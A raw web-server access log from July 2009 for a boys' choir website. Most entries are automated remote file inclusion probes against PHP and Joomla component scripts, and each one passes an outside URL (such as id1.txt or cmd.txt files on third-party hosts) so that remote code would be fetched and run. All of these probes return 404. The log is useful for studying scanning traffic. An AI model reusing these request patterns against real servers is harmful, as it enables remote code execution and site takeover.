70.85.213.106 - - [04/Jul/2009:11:56:03 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:56:04 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:56:07 -0700] "GET /admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:56:07 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:56:11 -0700] "GET /logs/access_090517.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:11:56:35 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:11:56:35 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:11:56:35 -0700] "GET /logs/access_090603.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:56:57 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:56:57 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:56:59 -0700] "GET /logs/access_090629.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:11:57:03 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:11:57:03 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:11:57:06 -0700] "GET /logs/access_090603.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:57:21 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:57:23 -0700] "GET /logs/access_090517.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:57:23 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:57:48 -0700] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:57:49 -0700] "GET /logs/access_090517.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:57:49 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:58:08 -0700] "GET /logs/access_090528.log//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:58:18 -0700] "GET /logs/access_090528.log%20%20//admin/business_inc/saveserver.php?thisdir=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
70.85.213.106 - - [04/Jul/2009:11:58:45 -0700] "GET /logs/access_090528.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.scoringsessions.com////img/large/2004/battlestargalactica/v4.5id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
94.23.2.21 - - [04/Jul/2009:11:59:15 -0700] "GET /logs//zero_vote/error.php?dir=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.americanboyschoir.com"
94.23.2.21 - - [04/Jul/2009:11:59:15 -0700] "GET /zero_vote/error.php?dir=http://fd.axl-jp.net//assets/export/beast-test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:12:00:12 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:12:00:13 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.americanboyschoir.com"
211.230.156.161 - - [04/Jul/2009:12:00:13 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://aboutav.com//back/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:12:00:19 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:12:01:24 -0700] "GET /logs/access_090626.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
195.34.78.110 - - [04/Jul/2009:12:01:26 -0700] "GET /logs/access_090626.log///administrator/components/com_virtuemart/errors.php?error=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:01:33 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:01:33 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:01:33 -0700] "GET /logs/access_090528.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:01:37 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:01:37 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:01:37 -0700] "GET /logs/access_090528.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:02:38 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:02:38 -0700] "GET /logs/access_090528.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:02:50 -0700] "GET /logs/access_090603.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:02:55 -0700] "GET /logs/access_090603.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:04:05 -0700] "GET /logs/access_090626.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:04:05 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:04:05 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
112.110.115.202 - - [04/Jul/2009:12:04:08 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.google.co.in/search?hl=en&q=%22intitle%3Aindex+of%22xxx&btnG=Search&meta=&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19" "www.americanboyschoir.com"
112.110.115.202 - - [04/Jul/2009:12:04:16 -0700] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19" "www.americanboyschoir.com"
112.110.115.202 - - [04/Jul/2009:12:04:16 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:12:04:20 -0700] "GET /logs/access_090603.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
112.110.115.202 - - [04/Jul/2009:12:04:32 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.americanboyschoir.com/xxx/resourcesgreg/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19" "www.americanboyschoir.com"
112.110.115.202 - - [04/Jul/2009:12:04:49 -0700] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19" "www.americanboyschoir.com"
112.110.115.202 - - [04/Jul/2009:12:05:05 -0700] "GET /xxx/ HTTP/1.1" 200 662 "http://www.americanboyschoir.com/xxx/resourcesgreg/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19" "www.americanboyschoir.com"
112.110.115.202 - - [04/Jul/2009:12:05:10 -0700] "GET /xxx/ HTTP/1.1" 200 662 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.36 Safari/525.19" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:05:46 -0700] "GET /logs/access.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:09:08 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:09:09 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:12:09:10 -0700] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:09:11 -0700] "GET /logs/access_090626.log%20%20//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:12:10:55 -0700] "GET /logs/access_090603.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:11:00 -0700] "GET /logs/access_090626.log//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:11:00 -0700] "GET /include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.78.62.84 - - [04/Jul/2009:12:11:00 -0700] "GET /logs//include/print_category.php?setup[use_category]=1&dir=http://spiskin.trakya.edu.tr/tr/images/phocagallery/lepra/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:11:57 -0700] "GET /logs/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:11:57 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:11:57 -0700] "GET /logs/access_090528.log/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:13:27 -0700] "GET /logs/access_090626.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
220.231.126.252 - - [04/Jul/2009:12:13:37 -0700] "GET /logs/access.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://request.radiomillenium.ro/common/metabase/idade1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
203.63.5.148 - - [04/Jul/2009:12:13:57 -0700] "GET /logs/access_090622.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:12:16:49 -0700] "GET /logs/access_090622.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:12:16:50 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:12:16:50 -0700] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:17:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:17:42 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:17:42 -0700] "GET /logs/access_090626.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:17:43 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
83.98.209.71 - - [04/Jul/2009:12:18:13 -0700] "GET /logs/access_090626.log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.infernodancevault.com//modules/tinycontent/admin/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:18:52 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:18:52 -0700] "GET /logs/access_090626.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:18:52 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:18:53 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
94.229.66.202 - - [04/Jul/2009:12:19:48 -0700] "GET /logs/access_090318.log%20/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:19:48 -0700] "GET /logs/access_090626.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:19:53 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:20:02 -0700] "GET /logs/access_090626.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.208.139.72 - - [04/Jul/2009:12:20:07 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:21:40 -0700] "GET /logs/access.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:21:40 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:21:40 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:21:41 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:21:41 -0700] "GET /logs/access.log//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:21:41 -0700] "GET /logs//show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
89.223.3.98 - - [04/Jul/2009:12:21:49 -0700] "GET /show_image_in_imgtag.php?mosConfig_absolute_path=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.americanboyschoir.com"
